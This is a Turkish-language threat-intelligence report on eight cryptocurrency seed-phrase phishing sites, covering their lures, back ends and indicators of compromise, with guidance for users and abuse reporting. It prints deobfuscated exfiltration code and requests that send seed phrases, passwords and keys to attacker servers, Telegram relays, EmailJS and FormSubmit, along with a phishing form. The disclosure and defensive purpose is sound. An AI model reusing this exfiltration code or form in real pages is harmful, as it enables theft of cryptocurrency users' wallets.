Kripto Para Kimlik Avının Yapısı:
8 Gerçek Saldırının İncelenmesi
Canlı kimlik avı trafiğini engelledik, 5 adet tohum cümlesi hırsızını tersine mühendislik yoluyla inceledik ve çalınan verilerin izini Telegram botlarına, EmailJS hesaplarına ve “Hizmet Olarak Kimlik Avı” arka uçlarına kadar sürdük.

Bulgularımız
Her gün binlerce kripto para kullanıcısı, meşru cüzdan hizmetlerinden ayırt edilemeyen kimlik avı siteleri yüzünden paralarını kaybediyor. Peki ne oluyor? arkasında Sahte “Connect Wallet” düğmesi mi? Tohum ifadeniz aslında nereye gidiyor?
5 aktif kimlik avı sitesinden canlı HTTP trafiğini yakaladık, bu sitelerin kaynak kodlarının tamamını indirdik ve her bir veri sızdırma uç noktasını nihai hedefine kadar izledik. Bu araştırma, tohum cümlenizi girmenizi sağlayan sosyal mühendislik hilelerinden, bunu saldırgana gerçek zamanlı olarak ileten Telegram botuna kadar, modern kripto kimlik avının tüm yapısını ortaya koyuyor.
Bu makalede gösterilen tüm tohum ifadeleri, rastgele oluşturulmuş test verileridir. Bu soruşturma sırasında hiçbir gerçek kimlik bilgisi ele geçirilmemiştir. Tüm siteler, ilgili barındırma sağlayıcılarına ve kötüye kullanım birimlerine bildirilmiştir.
Evrensel Saldırı Şeması
Farklı marka isimleri ve arka uç sistemlerine rağmen, bu 8 kimlik avı sitesinin tamamı şu tamamen aynı psikolojik süreç:
Önemli bir gözlem: “Bağlanıyor...” animasyonu her zaman başarısız olması için sabit kodlanmış. 4 numaralı sitenin kaynak kodunda şunu bulduk: const success = false — cüzdan bağlanma denemesi yapılmamaktadır. Tüm bu süreç, yalnızca kurbanları “Manuel Olarak Bağlan” formuna yönlendirmek amacıyla tasarlanmıştır.

8 Site: Ayrıntılı Analiz
Kimlik sahtekarlığı
Cüzdan doğrulaması için kurgusal bir “merkezi olmayan protokol”. Güvenilirlik sağlamak amacıyla canlı CryptoCompare fiyat göstergelerini ve gerçek blok zinciri gezginlerine (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano) bağlantılar kullanır. Ana sayfada 100'den fazla cüzdan logosu ve 3 adımlı bir "doğrulama" süreci yer almaktadır.
Çift Sızıntı Zinciri
Beşinin en gelişmiş arka ucu — çalınan her kimlik bilgisi buradan gönderilir iki bağımsız kanal aynı anda:
Victim submits seed phrase
|
+--> Channel 1: axios POST --> Express.js on Render.com
| |
| +--> Telegram Bot API --> @metatech2 (instant DM)
|
+--> Channel 2: fetch POST --> EmailJS API
|
+--> Bestgrace309@gmail.com (email backup) OSINT Bulguları
| Gösterge | Değer |
|---|---|
| Dolandırıcı E-postası | Bestgrace309@gmail.com |
| Telegram Botu | @DewdropsTG_bot (Kimlik: 7567323692) |
| Telegram Alıcısı | @metatech2 (Sohbet Kimliği: 7350941887) |
| Arka uç | emailjs-backend-ovtg.onrender.com |
| EmailJS Hizmeti | service_d5qigxs / template_7bqxeaa |
| Gizli Etki Alanı | layerschain.in (CF e-posta gizleme yönteminden) |
| Gönderilen Mesajlar | 1.824+ (Telegram mesaj_kimliğinden) |
| Alan Adı Yaşı | 2 gün (TLS: 25 Mart 2026) |
Saldırganın e-posta adresi bir JavaScript yorumu içeride config.js: // Bestgrace309@gmail.com. Dağıtımdan önce bunu kaldırmayı unutmuşlar. Ayrıca, Telegram aktarım arka ucu tamamen açık durumda — ne kimlik doğrulama var, ne de hız sınırlaması. Cloudflare’in data-cfemail HTML’deki şifreleme sayesinde, gizli bir e-posta adresi de ortaya çıkardık: support@layerschain.in, Hindistan ve Güney Afrika’daki barındırma altyapısına bağlanarak.
Kimlik sahtekarlığı
Gerçeğin piksel düzeyinde kusursuz bir kopyası Aqualibre (AQLA) token taşıma sayfası. HTML kodunda kaynağı gösteren bir meta veri etiketi bulunmaktadır: data-scrapbook-source="https://token.aqla.app/migration", 19 Kasım 2024 tarihli.
Sıfır Kod Yaklaşımı
Bu saldırganın şunlara ihtiyacı vardır: sunucu tarafında hiç kod yok. Form doğrudan şu adrese gönderilir: Statik Olmayan — statik siteler için meşru bir form arka ucu. Her gönderim, dolandırıcının e-posta adresine iletilir. Saldırganın e-posta adresi kaynak kodunda hiçbir zaman görünmez.
<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
<textarea name="phrase"></textarea>
<input name="private-key" />
<textarea name="keystore-json"></textarea>
<input name="password" />
</form>
Cloudflare Pages: ücretsiz. Un-static Forms: ücretsiz. Satın alınan alan adı yok. Kiralanan sunucu yok. Toplam altyapı maliyeti: sıfır dolar.
Kimlik sahtekarlığı
Alt etki alanı " içerirsafpal" — bir kasıtlı yazım hatası olan SafePal, popüler bir donanım cüzdanı. Site, 26 sahte konu kategorisi ile "Blockchain Wallet Rectification" adını kullanıyor. Typed.js’yi kullanarak zincir adlarını (Ethereum, BSC, Polygon...) canlandırıyor ve güvenilirlik yaratmak için bir LiveCoinWatch ticker’ı kullanıyor.
Aynı Kit, Aynı Operatör mü?
Şunu kullanır: tamamen aynı kimlik avı şablonu 2 numaralı site olarak:
aynı connect.html, aynı wallets.html 60'tan fazla logoyla, aynı Un-static arka ucu (farklı form kimliği — 6f1b82c3...da9943af). Aynı kit, şunu kuvvetle akla getiriyor: Her iki tesisi de tek bir operatör işletiyor.
Koddaki hatalar: "Privay Policy" (c harfi eksik), "seperated" (doğrusu "separated"), "Kestore" (y harfi eksik). Şifre alanı şunu kullanıyor: type="text" yerine type="password".
Kimlik sahtekarlığı
'nin neredeyse kusursuz bir kopyası Flare Ağı portal — FTSO ve Data Connector protokollerine sahip gerçek bir Katman-1 EVM blok zinciri. 30’dan fazla ekosistem ortağını, gezinme özelliklerini ve markalaşma unsurlarını taklit eder. Favikonlar bir typosquat adresinden yüklenir: portal.flaremainet.com ("mainnet" kelimesinde bir "n" eksik).
E-postaJS’de Çift Yedekleme
Bunu kullanan tek site iki ayrı EmailJS hesabını aynı anda kaldırılmaya karşı yedeklilik amacıyla:
// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4
// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
data: { service_id: 'service_isy47de',
template_id: 'template_dkk4d1b',
user_id: 'JsVEgXVcaSTro1etu' }
}) Her hırsızlık vakası için e-posta konusu: "New Wallet Details from Flare".
HTML'de şunlar yer almaktadır: Google Etiket Yöneticisi (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Lunio PPC korumasıve bir Twitter/X Reklamları pikseli. Saldırgan şu programı çalıştırıyor: ücretli reklamcılık kurbanları kimlik avı sitesine yönlendirmek ve bot tıklamalarını filtrelemek amacıyla. Bu bir hobi değil — analitik araçları ve reklam harcamalarıyla desteklenen, finansmanı sağlanmış bir operasyon.

Kimlik sahtekarlığı
Genel bir "COIN NODE" / "Wallet Fix" hizmeti (belirli bir marka yok). Telif hakkı "Wallet Fix 2022" — bu kit şablonu en az 4 yıllık. Görüntüler şu adreste barındırılıyor: pumpeth.com (AWS üzerinde WordPress).
Hizmet Olarak Kimlik Avı
En endişe verici arka uç mimarisi: bir UUID tabanlı çoklu kiracılı API:
POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data
wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+... Her dolandırıcıya kendine ait bir UUID uç noktası verilir. Merkezi bir operatör, API’yi yönetir, kampanyaları takip eder ve çalınan paradan bir pay alabilir. Bu, endüstriyel ölçekte kripto hırsızlığı — bir “Phishing-as-a-Service” modeli.
İlgili Altyapı (Çoğunlukla İşlevsiz)
| Etki Alanı | Görev | Durum |
|---|---|---|
| api.pulseresolve.com | Veri Sızdırma API’si | NXDOMAIN |
| walletissuesfix.net | Favicon barındırma hizmeti | NXDOMAIN |
| syncwallet.online | Logo barındırma hizmeti | NXDOMAIN |
| pumpeth.com | Görsel CDN | Canlı (AWS) |
Arka uç çalışmıyor, ancak ön uç hâlâ çalışır durumda Cloudflare Pages üzerinde. Saldırgan yeniden kayıt yaptırırsa pulseresolve.com, site anında yeniden çalışır hale gelir.
Kimlik sahtekarlığı
A iki yönlü operasyon: şu adresteki genel bir "Destek Merkezi" wallet-support-39n.pages.dev 15 sahte ürün kategorisi ve 39 cüzdan markası ile, ayrıca bir Piksel düzeyinde kusursuz Ledger kayıt süreci klonu 'de ledger-recovery.support Replit üzerinde barındırılan — cihaz modeli seçimi, PIN ayarı ve 24 kelimelik tohum cümlesi tablosu ile birlikte gerçek BIP39 otomatik tamamlama.
Anti-Scanner C2 Arka Ucu
Cüzdan destek sayfası, çalınan verileri şu adrese gönderir: api.uranustoken.org/log — Cloudflare arkasında çalışan özel bir nginx/Ubuntu C2. Arka uç tüm GET isteklerini kasıtlı olarak reddediyor (522 zaman aşımı hatası veriyor), yalnızca POST isteklerine yanıt veriyor. Bu, URL tarayıcılarının, Google Safe Browsing tarayıcılarının ve GET isteğiyle uç noktaya ping gönderen güvenlik araştırmacılarının hiçbir şey görememesi anlamına gelir — C2 sunucusu devre dışı gibi görünür.
// config.js — C2 config exposed in plaintext
const config = {
serverURL: "https://api.uranustoken.org",
allowedWallets: ["phantom","solfare","metamask","trustwallet",
"coinbasewallet","ledger","trezor","okx","sui","backpack",
"tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;
// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
fetch(serverURL + "/log", {
method: "POST",
headers: {"Content-Type": "application/json"},
body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
})
} Ledger klonu, Replit platformu üzerinde ayrı bir Express.js arka ucu çalıştırıyor: POST /api/recovery-phrase toplama {deviceId, pin, phrase}. Sonuç olarak 400 {"error":"Invalid data provided"} hatalı biçimlendirilmiş girdi durumunda — arka ucun canlı ve aktif olarak doğrulama aşamasında çalınan veriler.
OSINT Bulguları
| Gösterge | Değer |
|---|---|
| Ön Uç (Cüzdan) | wallet-support-39n.pages.dev |
| Ön Uç (Ledger) | ledger-recovery.support (34.111.179.208) |
| C2 Arka Uç | api.uranustoken.org → nginx/1.24.0 Ubuntu |
| C2 IP'leri | 104.21.60.163 / 172.67.198.35 (Cloudflare) |
| Replit Doğrulama | a43d3852-5304-47af-a61b-f0f6f3912736 |
| Kayıt Sorumlusu | Name.com (ledger-recovery.support) |
| Yerleştirildi | 9 Ocak 2026 (Last-Modified başlığı) |
| Teknoloji Yığını | React + Vite + Tailwind v4.1 + Framer Motion |
466 KB boyutundaki JS paketi şunları içerir: tam BIP39 kelime listesi gerçek zamanlı otomatik tamamlama özelliği için “passphrase” terimine 67, “mnemonic” terimine ise 39 kez atıfta bulunulmuştur. Ledger klonu, kurbanları gerçek bir Ledger cihazıyla tamamen aynı kurulum sürecinden geçiriyor — bu, tüm soruşturma boyunca karşılaşılan en inandırıcı kimlik avı sayfasıdır. Bu apiKey yapılandırmadaki bu alan şunu öneriyor: çoklu kiracılı PhaaS mimarisi.
Kimlik sahtekarlığı
Aşağıdakileri içeren genel bir "Merkezi Olmayan Lansman Platformu": 21 yem kategorisi (Staking, Geçiş, KYC, Hediye Kampanyası, Ödülleri Al, Varlık Kurtarma, Ön Satış, NFT Basımı, Kilitli Hesaplar...) ve 70'den fazla cüzdan markası — karşılaştığımız en kapsamlı cüzdan listelerinden biri. “Sychronize” (burada ‘n’ harfi eksik) şeklindeki bariz yazım hatası, bunun sahte olduğunu ele veriyor.
FormSubmit Pipeline
Kullanım Alanları FormSubmit.co — meşru bir “formdan e-postaya” hizmeti. Uç nokta hash’i a2cf4131f1a5d39453c7c183df96f86f dolandırıcının e-posta adresinin MD5 değeridir. Gmail, Yahoo, Hotmail, ProtonMail, Yandex ve Mail.ru’da yüzlerce e-posta şablonunu brute force yöntemiyle denedik — eşleşme yok. Dolandırıcı, nadir görülen veya rastgele oluşturulmuş bir e-posta adresi kullanır.
// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
method: "POST",
dataType: "JSON",
data: {
dappWord: seedPhrase, // THE STOLEN SEED PHRASE
dappName: walletName, // Which wallet was selected
linkName: "DAPP DECENTRALIZED" // Campaign identifier
}
}); OSINT Bulguları
| Gösterge | Değer |
|---|---|
| Etki Alanı | mainnetvalidationapp.pages.dev |
| Form Gönderme Hash'i | a2cf4131f1a5d39453c7c183df96f86f |
| Kampanya Kimliği | DAPP MERKEZİ OLMAYAN |
| FontAwesome Kiti | bdc3291137 (kit no. 112310842, ücretsiz v6.7.2) |
| jQuery | 3.2.1 ve 3.5.1 sürümleri aynı anda yüklendi |
| Bootstrap | CSS 5.2.2 + JS 5.3.0-alpha1 (uyumsuzluk) |
FontAwesome Kiti bdc3291137 — FontAwesome, bu kit kimliğinin ardındaki hesap sahibini tespit edebilir. Kampanya etiketi DAPP DECENTRALIZED aynı FormSubmit hash değerini kullanan diğer kimlik avı sitelerinde de görünebilir. Tohum cümlesini çaldıktan sonra, bir sahte QR kodu ve rastgele 7 karakterlik referans kodu şu mesaj görüntüleniyor: "Benzersiz referans kodunuzla yöneticiye başvurun" — soruşturma yapmak yerine mağdurları bekletmek.
Kimlik sahtekarlığı
Bilinmiyor — hem ön uç hem de arka uç çevrimdışı durumda. Yük yapısına göre, bu bir kripto cüzdan tohum cümlesi hırsızlığı saldırısıydı. Bu Cloudflare R2 genel depolama alanı (nesne depolama, Pages değil) bir iyi belgelenmiş bir kimlik avı yöntemi Netskope tarafından 5.000'den fazla zararlı sayfa tespit edildi ve trafiğin 61 kat arttığı bildirildi.
Script Kiddie Kurulumu
En temel işlem bu koleksiyonda. Tohum ifadeleri gönderilir kelime kelime ücretsiz Dinamik DNS üzerinden ev bilgisayarı veya VPS üzerinde çalışan bir PHP betiğine:
POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded
pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
+%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
+%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
+%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access OSINT Bulguları
| Gösterge | Değer |
|---|---|
| Ön Uç | pub-519769e9eb634616b1746c2018641d56.r2.dev [ÇEVRİMDIŞI] |
| Arka uç | mercifuljigga4real123.publicvm.com [NXDOMAIN] |
| R2 Kova Kimliği | 519769e9eb634616b1746c2018641d56 |
| DDNS Sağlayıcısı | DNSExit.com / Netdorm, Inc. (Cincinnati, OH) |
| DNS NS | ns10–13.dnsexit.com |
| Kullanıcı adı | mercifuljigga4real123 |
"Merciful" + "jigga" (Jay-Z'nin takma adı) + "4real" + "123" — hip-hop kültürüne yakınlığını yansıtan, son derece kişisel bir kullanıcı adı. Bulunamadı herhangi bir indekslenmiş platformda: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch veya Steam. Muhtemelen Discord, Telegram veya oyun platformlarında bu isimle ya da buna yakın varyasyonlarla aktiftir. Dosya adı fuc.php tutamağın cüretkar tarzına uyuyor.
Tohum İfadenizi Çalmanın 7 Yöntemi

| Yöntem | Siteler | Nasıl Çalışır? | Hız | Maliyet |
|---|---|---|---|---|
| Telegram Botu | #1 | Render.com üzerindeki Express.js, Bot API’ye yönlendirir. Dolandırıcı, kimlik bilgilerini içeren anlık bir özel mesaj alır. | Gerçek zamanlı | $0 |
| EmailJS | #1, #4 | İstemci tarafındaki JavaScript, verileri doğrudan EmailJS API’ye gönderir; bu API de verileri dolandırıcının e-posta adresine iletir. | ~1 dakika | $0 |
| Statik Olmayan Formlar | #2, #3 | Gönderimleri e-posta yoluyla ileten meşru bir form hizmetine yapılan standart HTML form POST isteği. | ~1 dakika | $0 |
| FormSubmit.co | #7 | jQuery AJAX ile FormSubmit.co'ya gönderim. E-posta adresi MD5 hash ile gizlenmiştir. Kampanya, "DAPP DECENTRALIZED" etiketiyle işaretlenmiştir. | ~1 dakika | $0 |
| Özel C2 API'si | #6 | React SPA, Cloudflare’in arkasındaki nginx/Express API’sine istek gönderir. GET isteklerini keser (522) tarayıcılardan kaçmak için. Yalnızca POST isteklerine yanıt verir. | Gerçek zamanlı | ~5 $/ay |
| PHP + DDNS | #8 | Ücretsiz Dinamik DNS (publicvm.com) aracılığıyla ev bilgisayarında çalışan bir PHP betiği. Tohum cümlesi kelime kelime gönderiliyor. | Gerçek zamanlı | $0 |
| PhaaS API'si | #5 | UUID tabanlı çoklu kiracılı API. Merkezi operatör arka ucu yönetir, dolandırıcılar ise uç noktaları kiralar. | Gerçek zamanlı | Bilinmiyor |
Her Kimlik Avı Sitesini Ortaya Çıkaran 7 Uyarı İşareti
Eğer görürseniz herhangi bir Bunlardan herhangi biriyle karşılaşırsanız, sekmeyi derhal kapatın:
Gerçek cüzdan bağlantıları, WalletConnect protokolünü veya tarayıcı uzantılarını kullanır. Bu bağlantılarda, tohum cümlenizi girmenizi isteyen bir “Bağlantı Başarısız” hatası asla görüntülenmez.
Her cüzdan simgesi aynı forma yönlendirir. Gerçek bir hizmet, her bir cüzdanın kendi SDK’sını entegre ederdi.
Gönderimden sonra ortaya çıkan sahte “503 Hatası” veya “Bilinmeyen Hata” mesajı kasıtlıdır. Verileriniz çoktan çalınmıştır — bu hata, sizi başka bir cüzdanla tekrar denemeye yönlendirmek için bir tuzaktır.
Bu 5 sitenin tamamı Cloudflare Pages’ın ücretsiz kademesini kötüye kullanıyor. Kimlik doğrulaması gerekmiyor. Cloudflare Pages’da kimlik avı amaçlı kötüye kullanım, 2025 yılında %198 arttı.
Hiçbir meşru hizmet bu üç kimlik bilgisi türünün hepsine ihtiyaç duymaz. Bu üç sekmeli form, bir kimlik avı kitinin tipik bir özelliğidir.
Bu sitelerin hiçbiri yüklenmiyor ethers.js, web3.js, ya da herhangi bir RPC çağrısı yapamazlar. Bunlar, dApp gibi görünen saf HTML formlarıdır.
Ücretsiz barındırma + ücretsiz form hizmetleri + ücretsiz mesajlaşma = 0 dolara tam donanımlı bir kimlik avı operasyonu. Sitenin gerçek bir alan adı yoksa, şüphelenin.
Tam IOC Tablosu
Güvenlik ekipleri, tehdit istihbarat platformları ve kötüye kullanım bildirimcileri için:
Alan Adları ve Altyapı
| Etki Alanı | Tür | Durum |
|---|---|---|
| networklayers.pages.dev | Kimlik avı ön ucu | Canlı |
| token-aqla.pages.dev | Kimlik avı ön ucu | Canlı |
| antiresolve-mysafpalnode.pages.dev | Kimlik avı ön ucu | Canlı |
| flaremainnet.pages.dev | Kimlik avı ön ucu | Canlı |
| swiftauthapps.pages.dev | Kimlik avı ön ucu | Canlı |
| emailjs-backend-ovtg.onrender.com | TG röle arka ucu | Canlı |
| portal.flaremainet.com | Yazım hatası içeren alan adları | Bilinmiyor |
| layerschain.in | İlgili alan adı | DNS çalışmıyor |
| api.pulseresolve.com | PhaaS arka ucu | NXDOMAIN |
| walletissuesfix.net | Varlık barındırma hizmeti | NXDOMAIN |
| syncwallet.online | Logo barındırma hizmeti | NXDOMAIN |
| pumpeth.com | Görsel CDN | Canlı (AWS) |
| wallet-support-39n.pages.dev | Kimlik avı ön ucu | Canlı |
| ledger-recovery.support | Ledger kimlik avı (Replit) | Canlı |
| api.uranustoken.org | C2 arka ucu (nginx/Ubuntu) | Canlı |
| uranustoken.org | Kök etki alanı | 404 |
| mainnetvalidationapp.pages.dev | Kimlik avı ön ucu | Canlı |
| pub-519769e9eb634616b1746c2018641d56.r2.dev | Kimlik avı (R2 grubu) | Çevrimdışı |
| mercifuljigga4real123.publicvm.com | PHP arka ucu (DDNS) | NXDOMAIN |
Hesaplar ve Kimlik Bilgileri
| Tür | Değer | Site |
|---|---|---|
| E-posta | Bestgrace309@gmail.com | #1 |
| E-posta (gizli) | support@layerschain.in | #1 |
| Telegram Botu | @DewdropsTG_bot (7567323692) | #1 |
| Telegram Kullanıcısı | @metatech2 (7350941887) | #1 |
| EmailJS #1 | service_d5qigxs / I-7q0Bs-ilK3rFcWj | #1 |
| EmailJS #2 | service_6dt5h1k / Sza6lhzA9hKHrm1k4 | #4 |
| EmailJS #3 | service_isy47de / JsVEgXVcaSTro1etu | #4 |
| Statik Olmayan Form | c78173e2d991...94c3f76 | #2 |
| Statik Olmayan Form | 6f1b82c3ce55...da9943af | #3 |
| PhaaS UUID'si | a26db20c-1dc4-4208-a60a-c2c3b22c02ef | #5 |
| GTM | GTM-WX2D2TR | #4 |
| MS Clarity | j4bllybjkp | #4 |
| Render Örneği | rndr-id: ed83576e-b1b3-4c82 | #1 |
| Replit Doğrulama | a43d3852-5304-47af-a61b-f0f6f3912736 | #6 |
| Form Gönderme MD5 | a2cf4131f1a5d39453c7c183df96f86f | #7 |
| Kampanya Etiketi | DAPP MERKEZİ OLMAYAN | #7 |
| FontAwesome Kiti | bdc3291137 (set no. 112310842) | #7 |
| R2 Kova Kimliği | 519769e9eb634616b1746c2018641d56 | #8 |
| Kullanıcı Adı/DDNS | mercifuljigga4real123 | #8 |
Kripto Para Kimlik Avı Olaylarını Nereye Bildirmeli?

| Hizmet | Neler Bildirilmelidir? | Nasıl |
|---|---|---|
| Cloudflare | 7 adet .pages.dev + 1 adet R2 depolama alanı | abuse.cloudflare.com |
| Google Safe Browsing | Tüm kimlik avı URL’leri | Oltalama Girişimini Bildir |
| PhishTank | Topluluk engelleme listesine ait tüm URL’ler | phishtank.org |
| EmailJS | 3 adet kötüye kullanılmış hesap (yukarıdaki hizmet kimlikleri) | abuse@emailjs.com |
| Statik Olmayan | 2 form uç noktası | un-static.com üzerinden iletişime geçin |
| Render.com | Telegram aktarım arka ucu | Kötüye kullanım bildirim formunu gönder |
| Telegram | @DewdropsTG_bot + @metatech2 | telegram.org/support |
| Google (Gmail) | Bestgrace309@gmail.com | Google'a kötüye kullanım bildirimi |
| Twitter/X | 4 numaralı siteyi tanıtan reklam hesabı | X reklamları kötüye kullanım bildirimi |
| FormSubmit.co | Hash a2cf4131... (#7) | Form Gönderme – Kötüye Kullanım Bildirim Formu |
| Replit | ledger-recovery.support (#6) | Replit kötüye kullanım bildirimi |
| Name.com | ledger-recovery.support için kayıt sorumlusu | Name.com kötüye kullanım |
| DNSExit | mercifuljigga4real123.publicvm.com | dnsexit.com kötüye kullanım |
| FontAwesome | Kit bdc3291137 (#7) | FontAwesome'ın kötüye kullanımı |
| Chainabuse | Tüm kimlik avı kampanyaları | Chainabuse.com |
Kendinizi Nasıl Koruyabilirsiniz?
Hiçbir meşru hizmet, sizden bir web sitesine tohum cümlenizi girmenizi istemez. Tohum ifadeleri yalnızca cüzdanın kurtarılması sırasında resmi cüzdan yazılımına girilir — asla üçüncü taraf "doğrulama", "senkronizasyon" veya "kurtarma" web sitelerine girilmez.
Herhangi bir cüzdanı bağlamadan önce:
- URL’nin resmi alan adıyla eşleştiğini doğrulayın. SSL sertifikasının ayrıntılarını kontrol edin.
- Gerçek WalletConnect, bir QR kodu veya derin bağlantı kullanır — asla tohum cümlesi biçimini kullanmaz.
- Eğer "bağlantı kurulamadı" mesajı çıkarsa ve sizden kimlik bilgilerinizi manuel olarak girmeniz istenirse — bu bir kimlik avıdır.
- Şüpheli URL’leri şu adresten kontrol edin: PhishTank veya VirusTotal etkileşime geçmeden önce.
- Bir donanım cüzdanı kullanın — bu cüzdan, her işlem için fiziksel onay gerektirir.
- Resmi URL’leri yer imlerine ekleyin. Reklamlardaki, özel mesajlardaki veya sosyal medyadaki bağlantılara asla tıklamayın.
Kripto Kimlik Avı Sınıflandırması
Tohum cümlesi hırsızları sadece bir kategoridir. İşte kripto para dolandırıcılığının genel tablosu — her bir tür hakkında ayrıntılı analizler ekleyeceğiz.
Rahatsız Edici Gerçek
Bir kripto para dolandırıcılığı operasyonunu kurmanın maliyeti $0 ve sürer 30 dakikadan az. Ücretsiz barındırma, ücretsiz form hizmetleri, ücretsiz mesajlaşma botları. 1 numaralı sitenin arkasındaki saldırgan, halihazırda şu sitelerden kullanıcı bilgilerini ele geçirmiştir: 1.824'ten fazla mağdur. 4 numaralı tesis şu anda çalışır durumda ücretli reklamcılık büyüklüğüne göre. Bu amatörlerin işi değil — bu bir endüstri. Tek savunma yolu farkındalıktır.
Mücadelemize Destek Olun
PhishDestroy, kripto para dolandırıcılığı sitelerini gerçek zamanlı olarak takip eder ve bildirir. Şüpheli bir siteyle karşılaştıysanız, bunu bize bildirin — durumu inceleyeceğiz ve sitenin kaldırılması için çalışacağız.



